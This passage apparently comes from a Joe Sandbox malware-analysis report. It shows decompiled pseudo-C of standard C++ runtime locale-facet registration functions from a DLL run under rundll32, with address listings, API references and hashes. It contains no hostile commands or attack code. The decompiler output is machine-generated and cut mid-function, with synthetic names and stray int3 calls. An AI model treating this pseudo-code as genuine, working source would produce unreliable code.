											E6E2066BA(_t330 - 0x14);
											return E6E220075(_t309);
										} else {
											__eflags = _t317;
											if(_t317 == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6E21C0B8(_t234, _t251, __edx, _t309, _t317) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t330 - 0x20);
													E6E223D74(_t330 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t234, _t309, _t317, 0x14);
													E6E206653(_t330 - 0x14, 0);
													_t318 =  *0x6e2c6e3c; // 0x0
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6E1E161C(0x6e2c6e1c);
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6E2066BA(_t330 - 0x14);
														return E6E220075(_t310);
													} else {
														__eflags = _t318;
														if(_t318 == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6E21C120(_t234, _t258, _t305, _t310, _t318) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t330 - 0x20);
																E6E223D74(_t330 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t234, _t310, _t318, 0x14);
																E6E206653(_t330 - 0x14, 0);
																_t319 =  *0x6e2c6e38; // 0x0
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6E1E161C(0x6e2c6e18);
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6E2066BA(_t330 - 0x14);
																	return E6E220075(_t311);
																} else {
																	__eflags = _t319;
																	if(_t319 == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6E21C1A4(_t234, _t265, _t305, _t311, _t319) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t330 - 0x20);
																			E6E223D74(_t330 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t234, _t311, _t319, 0x14);
																			E6E206653(_t330 - 0x14, 0);
																			_t320 =  *0x6e2c6e40; // 0x0
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6E1E161C(0x6e2c6e20);
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6E2066BA(_t330 - 0x14);
																				return E6E220075(_t312);
																			} else {
																				__eflags = _t320;
																				if(_t320 == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6E21C229(_t234, _t272, _t305, _t312, _t320) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t330 - 0x20);
																						E6E223D74(_t330 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t234, _t312, _t320, 0x14);
																						E6E206653(_t330 - 0x14, 0);
																						_t321 =  *0x6e2c6e44; // 0x0
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6E1E161C(0x6e2c6e24);
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6E2066BA(_t330 - 0x14);
																							return E6E220075(_t313);
																						} else {
																							__eflags = _t321;
																							if(_t321 == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6E21C295(_t234, _t279, _t305, _t313, _t321) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6E1E1438(_t283);
																									E6E223D74(_t330 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e26851f, _t234, _t313, _t321, 4);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6e26c414;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6E21D028(_t234, _t283, _t305, _t313, _t322,  *_t105);
																									return E6E220075(_t322,  *((intOrPtr*)(_t330 + 8)));
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6E206FD3(__eflags, _t313);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6e2c6e44 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6E206FD3(__eflags, _t312);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6e2c6e40 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6E206FD3(__eflags, _t311);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6e2c6e38 = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6E206FD3(__eflags, _t310);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6e2c6e3c = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6E206FD3(__eflags, _t309);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6e2c6e34 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6E206FD3(__eflags, _t308);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6e2c6e30 = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6E206FD3(__eflags, _t307);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6e2c6e2c = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}



























                          0x6e21b7f2
                          0x6e21b7f2
                          0x6e21b7f9
                          0x6e21b803
                          0x6e21b808
                          0x6e21b813
                          0x6e21b817
                          0x6e21b81a
                          0x6e21b81f
                          0x6e21b823
                          0x6e21b828
                          0x6e21b82c
                          0x6e21b871
                          0x6e21b874
                          0x6e21b880
                          0x6e21b82e
                          0x6e21b830
                          0x6e21b836
                          0x6e21b83c
                          0x6e21b844
                          0x6e21b847
                          0x6e21b884
                          0x6e21b892
                          0x6e21b897
                          0x6e21b89f
                          0x6e21b8a9
                          0x6e21b8ae
                          0x6e21b8b9
                          0x6e21b8bd
                          0x6e21b8c0
                          0x6e21b8c5
                          0x6e21b8ce
                          0x6e21b8d0
                          0x6e21b8d2
                          0x6e21b917
                          0x6e21b91a
                          0x6e21b926
                          0x6e21b8d4
                          0x6e21b8d4
                          0x6e21b8d6
                          0x6e21b8dc
                          0x6e21b8e2
                          0x6e21b8ea
                          0x6e21b8ed
                          0x6e21b92a
                          0x6e21b938
                          0x6e21b93d
                          0x6e21b945
                          0x6e21b94f
                          0x6e21b954
                          0x6e21b95f
                          0x6e21b963
                          0x6e21b966
                          0x6e21b96b
                          0x6e21b974
                          0x6e21b976
                          0x6e21b978
                          0x6e21b9bd
                          0x6e21b9c0
                          0x6e21b9cc
                          0x6e21b97a
                          0x6e21b97a
                          0x6e21b97c
                          0x6e21b982
                          0x6e21b988
                          0x6e21b990
                          0x6e21b993
                          0x6e21b9d0
                          0x6e21b9de
                          0x6e21b9e3
                          0x6e21b9eb
                          0x6e21b9f5
                          0x6e21b9fa
                          0x6e21ba05
                          0x6e21ba09
                          0x6e21ba0c
                          0x6e21ba11
                          0x6e21ba1a
                          0x6e21ba1c
                          0x6e21ba1e
                          0x6e21ba63
                          0x6e21ba66
                          0x6e21ba72
                          0x6e21ba20
                          0x6e21ba20
                          0x6e21ba22
                          0x6e21ba28
                          0x6e21ba2e
                          0x6e21ba36
                          0x6e21ba39
                          0x6e21ba76
                          0x6e21ba84
                          0x6e21ba89
                          0x6e21ba91
                          0x6e21ba9b
                          0x6e21baa0
                          0x6e21baab
                          0x6e21baaf
                          0x6e21bab2
                          0x6e21bab7
                          0x6e21bac0
                          0x6e21bac2
                          0x6e21bac4
                          0x6e21bb09
                          0x6e21bb0c
                          0x6e21bb18
                          0x6e21bac6
                          0x6e21bac6
                          0x6e21bac8
                          0x6e21bace
                          0x6e21bad4
                          0x6e21badc
                          0x6e21badf
                          0x6e21bb1c
                          0x6e21bb2a
                          0x6e21bb2f
                          0x6e21bb37
                          0x6e21bb41
                          0x6e21bb46
                          0x6e21bb51
                          0x6e21bb55
                          0x6e21bb58
                          0x6e21bb5d
                          0x6e21bb66
                          0x6e21bb68
                          0x6e21bb6a
                          0x6e21bbaf
                          0x6e21bbb2
                          0x6e21bbbe
                          0x6e21bb6c
                          0x6e21bb6c
                          0x6e21bb6e
                          0x6e21bb74
                          0x6e21bb7a
                          0x6e21bb82
                          0x6e21bb85
                          0x6e21bbc2
                          0x6e21bbd0
                          0x6e21bbd5
                          0x6e21bbdd
                          0x6e21bbe7
                          0x6e21bbec
                          0x6e21bbf7
                          0x6e21bbfb
                          0x6e21bbfe
                          0x6e21bc03
                          0x6e21bc0c
                          0x6e21bc0e
                          0x6e21bc10
                          0x6e21bc55
                          0x6e21bc58
                          0x6e21bc64
                          0x6e21bc12
                          0x6e21bc12
                          0x6e21bc14
                          0x6e21bc1a
                          0x6e21bc20
                          0x6e21bc28
                          0x6e21bc2b
                          0x6e21bc65
                          0x6e21bc68
                          0x6e21bc76
                          0x6e21bc7b
                          0x6e21bc83
                          0x6e21bc88
                          0x6e21bc8a
                          0x6e21bc90
                          0x6e21bc93
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bca0
                          0x6e21bca6
                          0x6e21bca9
                          0x6e21bcb5
                          0x6e21bc2d
                          0x6e21bc2d
                          0x6e21bc30
                          0x6e21bc34
                          0x6e21bc38
                          0x6e21bc45
                          0x6e21bc4d
                          0x6e21bc4f
                          0x00000000
                          0x6e21bc4f
                          0x6e21bc16
                          0x6e21bc16
                          0x00000000
                          0x6e21bc16
                          0x6e21bc14
                          0x6e21bb87
                          0x6e21bb87
                          0x6e21bb8a
                          0x6e21bb8e
                          0x6e21bb92
                          0x6e21bb9f
                          0x6e21bba7
                          0x6e21bba9
                          0x00000000
                          0x6e21bba9
                          0x6e21bb70
                          0x6e21bb70
                          0x00000000
                          0x6e21bb70
                          0x6e21bb6e
                          0x6e21bae1
                          0x6e21bae1
                          0x6e21bae4
                          0x6e21bae8
                          0x6e21baec
                          0x6e21baf9
                          0x6e21bb01
                          0x6e21bb03
                          0x00000000
                          0x6e21bb03
                          0x6e21baca
                          0x6e21baca
                          0x00000000
                          0x6e21baca
                          0x6e21bac8
                          0x6e21ba3b
                          0x6e21ba3b
                          0x6e21ba3e
                          0x6e21ba42
                          0x6e21ba46
                          0x6e21ba53
                          0x6e21ba5b
                          0x6e21ba5d
                          0x00000000
                          0x6e21ba5d
                          0x6e21ba24
                          0x6e21ba24
                          0x00000000
                          0x6e21ba24
                          0x6e21ba22
                          0x6e21b995
                          0x6e21b995
                          0x6e21b998
                          0x6e21b99c
                          0x6e21b9a0
                          0x6e21b9ad
                          0x6e21b9b5
                          0x6e21b9b7
                          0x00000000
                          0x6e21b9b7
                          0x6e21b97e
                          0x6e21b97e
                          0x00000000
                          0x6e21b97e
                          0x6e21b97c
                          0x6e21b8ef
                          0x6e21b8ef
                          0x6e21b8f2
                          0x6e21b8f6
                          0x6e21b8fa
                          0x6e21b907
                          0x6e21b90f
                          0x6e21b911
                          0x00000000
                          0x6e21b911
                          0x6e21b8d8
                          0x6e21b8d8
                          0x00000000
                          0x6e21b8d8
                          0x6e21b8d6
                          0x6e21b849
                          0x6e21b849
                          0x6e21b84c
                          0x6e21b850
                          0x6e21b854
                          0x6e21b861
                          0x6e21b869
                          0x6e21b86b
                          0x00000000
                          0x6e21b86b
                          0x6e21b832
                          0x6e21b832
                          0x00000000
                          0x6e21b832
                          0x6e21b830

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21B7F9
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21B803
                          • int.LIBCPMT ref: 6E21B81A
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • messages.LIBCPMT ref: 6E21B83D
                          • std::_Facet_Register.LIBCPMT ref: 6E21B854
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21B874
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21B892
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
                          • String ID:
                          • API String ID: 438560357-0
                          • Opcode ID: 89acaaeb718a5b99678f8af303aeaa38c7a4077168950041d33c9beefdaed25c
                          • Instruction ID: fa31074f765baaf55ad792064010492f97346163ee0330b65fad62241eb71be0
                          • Opcode Fuzzy Hash: 89acaaeb718a5b99678f8af303aeaa38c7a4077168950041d33c9beefdaed25c
                          • Instruction Fuzzy Hash: 8311E079D0451ECBCF00EBE4C894AEDB7BBBF48B18F150919E510AB390DBB49A44CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F567, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F567(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t181;
				signed int _t182;
				void* _t194;
				void* _t207;
				void* _t220;
				void* _t233;
				void* _t246;
				void* _t259;
				void* _t272;
				void* _t285;
				void* _t298;
				void* _t311;
				void* _t324;
				signed int _t473;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				void* _t550;

				_t510 = __edx;
				_t389 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t550 - 0x14, 0);
				_t525 =  *0x6e2c6df8; // 0x0
				 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
				 *(_t550 - 0x10) = _t525;
				_t181 = E6E1E161C(0x6e2c6da4);
				_t392 =  *((intOrPtr*)(_t550 + 8));
				_t182 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t181);
				_t512 = _t182;
				if(_t182 != 0) {
					L5:
					E6E2066BA(_t550 - 0x14);
					return E6E220075(_t512);
				} else {
					if(_t525 == 0) {
						_push( *((intOrPtr*)(_t550 + 8)));
						_push(_t550 - 0x10);
						__eflags = E6E211127(__ebx, _t392, __edx, _t512, _t525) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t550 - 0x20);
							E6E223D74(_t550 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t512, _t525, 0x14);
							E6E206653(_t550 - 0x14, 0);
							_t526 =  *0x6e2c6df4; // 0x0
							 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
							 *(_t550 - 0x10) = _t526;
							_t194 = E6E1E161C(0x6e2c6da0);
							_t399 =  *((intOrPtr*)(_t550 + 8));
							_t513 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t194);
							__eflags = _t513;
							if(_t513 != 0) {
								L12:
								E6E2066BA(_t550 - 0x14);
								return E6E220075(_t513);
							} else {
								__eflags = _t526;
								if(_t526 == 0) {
									_push( *((intOrPtr*)(_t550 + 8)));
									_push(_t550 - 0x10);
									__eflags = E6E2111AB(_t389, _t399, __edx, _t513, _t526) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t550 - 0x20);
										E6E223D74(_t550 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t389, _t513, _t526, 0x14);
										E6E206653(_t550 - 0x14, 0);
										_t527 =  *0x6e2c6dc8; // 0x0
										 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
										 *(_t550 - 0x10) = _t527;
										_t207 = E6E1E161C(0x6e2c6d7c);
										_t406 =  *((intOrPtr*)(_t550 + 8));
										_t514 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t207);
										__eflags = _t514;
										if(_t514 != 0) {
											L19:
											E6E2066BA(_t550 - 0x14);
											return E6E220075(_t514);
										} else {
											__eflags = _t527;
											if(_t527 == 0) {
												_push( *((intOrPtr*)(_t550 + 8)));
												_push(_t550 - 0x10);
												__eflags = E6E211230(_t389, _t406, __edx, _t514, _t527) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t550 - 0x20);
													E6E223D74(_t550 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t389, _t514, _t527, 0x14);
													E6E206653(_t550 - 0x14, 0);
													_t528 =  *0x6e2c6dc4; // 0x0
													 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
													 *(_t550 - 0x10) = _t528;
													_t220 = E6E1E161C(0x6e2c6d78);
													_t413 =  *((intOrPtr*)(_t550 + 8));
													_t515 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t220);
													__eflags = _t515;
													if(_t515 != 0) {
														L26:
														E6E2066BA(_t550 - 0x14);
														return E6E220075(_t515);
													} else {
														__eflags = _t528;
														if(_t528 == 0) {
															_push( *((intOrPtr*)(_t550 + 8)));
															_push(_t550 - 0x10);
															__eflags = E6E2112B4(_t389, _t413, _t510, _t515, _t528) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t550 - 0x20);
																E6E223D74(_t550 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t389, _t515, _t528, 0x14);
																E6E206653(_t550 - 0x14, 0);
																_t529 =  *0x6e2c6dd8; // 0x0
																 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																 *(_t550 - 0x10) = _t529;
																_t233 = E6E1E161C(0x6e2c6d84);
																_t420 =  *((intOrPtr*)(_t550 + 8));
																_t516 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t233);
																__eflags = _t516;
																if(_t516 != 0) {
																	L33:
																	E6E2066BA(_t550 - 0x14);
																	return E6E220075(_t516);
																} else {
																	__eflags = _t529;
																	if(_t529 == 0) {
																		_push( *((intOrPtr*)(_t550 + 8)));
																		_push(_t550 - 0x10);
																		__eflags = E6E211339(_t389, _t420, _t510, _t516, _t529) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t550 - 0x20);
																			E6E223D74(_t550 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t389, _t516, _t529, 0x14);
																			E6E206653(_t550 - 0x14, 0);
																			_t530 =  *0x6e2c6db0; // 0x0
																			 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																			 *(_t550 - 0x10) = _t530;
																			_t246 = E6E1E161C(0x6e2c6d64);
																			_t427 =  *((intOrPtr*)(_t550 + 8));
																			_t517 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t246);
																			__eflags = _t517;
																			if(_t517 != 0) {
																				L40:
																				E6E2066BA(_t550 - 0x14);
																				return E6E220075(_t517);
																			} else {
																				__eflags = _t530;
																				if(_t530 == 0) {
																					_push( *((intOrPtr*)(_t550 + 8)));
																					_push(_t550 - 0x10);
																					__eflags = E6E2113A1(_t389, _t427, _t510, _t517, _t530) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t550 - 0x20);
																						E6E223D74(_t550 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t389, _t517, _t530, 0x14);
																						E6E206653(_t550 - 0x14, 0);
																						_t531 =  *0x6e2c6ddc; // 0x0
																						 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																						 *(_t550 - 0x10) = _t531;
																						_t259 = E6E1E161C(0x6e2c6d88);
																						_t434 =  *((intOrPtr*)(_t550 + 8));
																						_t518 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t259);
																						__eflags = _t518;
																						if(_t518 != 0) {
																							L47:
																							E6E2066BA(_t550 - 0x14);
																							return E6E220075(_t518);
																						} else {
																							__eflags = _t531;
																							if(_t531 == 0) {
																								_push( *((intOrPtr*)(_t550 + 8)));
																								_push(_t550 - 0x10);
																								__eflags = E6E211409(_t389, _t434, _t510, _t518, _t531) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t550 - 0x20);
																									E6E223D74(_t550 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t389, _t518, _t531, 0x14);
																									E6E206653(_t550 - 0x14, 0);
																									_t532 =  *0x6e2c6de0; // 0x0
																									 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																									 *(_t550 - 0x10) = _t532;
																									_t272 = E6E1E161C(0x6e2c6d8c);
																									_t441 =  *((intOrPtr*)(_t550 + 8));
																									_t519 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t272);
																									__eflags = _t519;
																									if(_t519 != 0) {
																										L54:
																										E6E2066BA(_t550 - 0x14);
																										return E6E220075(_t519);
																									} else {
																										__eflags = _t532;
																										if(_t532 == 0) {
																											_push( *((intOrPtr*)(_t550 + 8)));
																											_push(_t550 - 0x10);
																											__eflags = E6E211471(_t389, _t441, _t510, _t519, _t532) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t550 - 0x20);
																												E6E223D74(_t550 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t389, _t519, _t532, 0x14);
																												E6E206653(_t550 - 0x14, 0);
																												_t533 =  *0x6e2c6dfc; // 0x0
																												 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																												 *(_t550 - 0x10) = _t533;
																												_t285 = E6E1E161C(0x6e2c6da8);
																												_t448 =  *((intOrPtr*)(_t550 + 8));
																												_t520 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t285);
																												__eflags = _t520;
																												if(_t520 != 0) {
																													L61:
																													E6E2066BA(_t550 - 0x14);
																													return E6E220075(_t520);
																												} else {
																													__eflags = _t533;
																													if(_t533 == 0) {
																														_push( *((intOrPtr*)(_t550 + 8)));
																														_push(_t550 - 0x10);
																														__eflags = E6E2114EC(_t389, _t448, _t510, _t520, _t533) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t550 - 0x20);
																															E6E223D74(_t550 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t389, _t520, _t533, 0x14);
																															E6E206653(_t550 - 0x14, 0);
																															_t534 =  *0x6e2c6dcc; // 0x0
																															 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																															 *(_t550 - 0x10) = _t534;
																															_t298 = E6E1E161C(0x6e2c6d80);
																															_t455 =  *((intOrPtr*)(_t550 + 8));
																															_t521 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t298);
																															__eflags = _t521;
																															if(_t521 != 0) {
																																L68:
																																E6E2066BA(_t550 - 0x14);
																																return E6E220075(_t521);
																															} else {
																																__eflags = _t534;
																																if(_t534 == 0) {
																																	_push( *((intOrPtr*)(_t550 + 8)));
																																	_push(_t550 - 0x10);
																																	__eflags = E6E211558(_t389, _t455, _t510, _t521, _t534) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t550 - 0x20);
																																		E6E223D74(_t550 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t389, _t521, _t534, 0x14);
																																		E6E206653(_t550 - 0x14, 0);
																																		_t535 =  *0x6e2c6e00; // 0x0
																																		 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																																		 *(_t550 - 0x10) = _t535;
																																		_t311 = E6E1E161C(0x6e2c6dac);
																																		_t462 =  *((intOrPtr*)(_t550 + 8));
																																		_t522 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t311);
																																		__eflags = _t522;
																																		if(_t522 != 0) {
																																			L75:
																																			E6E2066BA(_t550 - 0x14);
																																			return E6E220075(_t522);
																																		} else {
																																			__eflags = _t535;
																																			if(_t535 == 0) {
																																				_push( *((intOrPtr*)(_t550 + 8)));
																																				_push(_t550 - 0x10);
																																				__eflags = E6E2115C4(_t389, _t462, _t510, _t522, _t535) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t550 - 0x20);
																																					E6E223D74(_t550 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t389, _t522, _t535, 0x14);
																																					E6E206653(_t550 - 0x14, 0);
																																					_t536 =  *0x6e2c6dd0; // 0x0
																																					 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																																					 *(_t550 - 0x10) = _t536;
																																					_t324 = E6E1E161C(0x6e2c6d60);
																																					_t469 =  *((intOrPtr*)(_t550 + 8));
																																					_t523 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t324);
																																					__eflags = _t523;
																																					if(_t523 != 0) {
																																						L82:
																																						E6E2066BA(_t550 - 0x14);
																																						return E6E220075(_t523);
																																					} else {
																																						__eflags = _t536;
																																						if(_t536 == 0) {
																																							_push( *((intOrPtr*)(_t550 + 8)));
																																							_push(_t550 - 0x10);
																																							__eflags = E6E21162A(_t389, _t469, _t510, _t523, _t536) - 0xffffffff;
																																							if(__eflags == 0) {
																																								_t473 = _t550 - 0x20;
																																								E6E1E1438(_t473);
																																								E6E223D74(_t550 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e26851f, _t389, _t523, _t536, 4);
																																								_t537 = _t473;
																																								 *(_t550 - 0x10) = _t537;
																																								 *((intOrPtr*)(_t537 + 4)) =  *((intOrPtr*)(_t550 + 0xc));
																																								_push( *((intOrPtr*)(_t550 + 0x14)));
																																								_t175 = _t550 - 4;
																																								 *_t175 =  *(_t550 - 4) & 0x00000000;
																																								__eflags =  *_t175;
																																								 *_t537 = 0x6e26c0c4;
																																								 *((char*)(_t537 + 0x28)) =  *((intOrPtr*)(_t550 + 0x10));
																																								E6E21542F(_t389, _t473, _t510, _t523, _t537,  *_t175);
																																								return E6E220075(_t537,  *((intOrPtr*)(_t550 + 8)));
																																							} else {
																																								_t523 =  *(_t550 - 0x10);
																																								 *(_t550 - 0x10) = _t523;
																																								 *(_t550 - 4) = 1;
																																								E6E206FD3(__eflags, _t523);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t523 + 4))))();
																																								 *0x6e2c6dd0 = _t523;
																																								goto L82;
																																							}
																																						} else {
																																							_t523 = _t536;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t522 =  *(_t550 - 0x10);
																																					 *(_t550 - 0x10) = _t522;
																																					 *(_t550 - 4) = 1;
																																					E6E206FD3(__eflags, _t522);
																																					 *0x6e26a26c();
